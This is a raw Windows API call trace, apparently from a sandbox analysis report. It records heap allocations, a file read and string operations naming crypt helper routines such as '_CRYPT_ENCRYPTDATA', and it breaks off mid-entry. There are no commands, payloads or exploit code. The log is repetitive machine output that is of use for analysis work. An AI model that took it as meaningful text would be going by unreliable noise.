0 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0044.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0044.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0044.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0044.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0044.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0044.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0044.004] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0044.004] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xa3d6, lpOverlapped=0x0) returned 1 [0044.006] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0044.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0044.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0044.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0044.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa3d6) returned 0xac2018 [0044.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0044.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0044.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0044.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0044.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0044.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0044.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa3d6) returned 0xacc3f8 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.008] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa3d6) returned 0xac2018 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.008] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0044.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0044.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0044.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0044.009] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0044.009] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0044.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa3d6) returned 0xac2018 [0044.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0044.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0044.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0044.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0044.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa3d6) returned 0xad67d8 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0044.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0044.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0044.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0044.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0044.011] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0044.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0044.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0044.011] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0044.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0044.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da158 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0044.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb08 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0044.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0044.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0044.011] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0044.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0044.012] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0044.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0044.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0044.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0044.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0044.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0044.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0044.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.013] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0044.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0044.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0044.013] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0044.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0044.014] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0044.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0044.014] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0044.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0044.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0044.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0044.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0044.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0044.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0044.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0044.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0044.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.015] HeapFree (in: 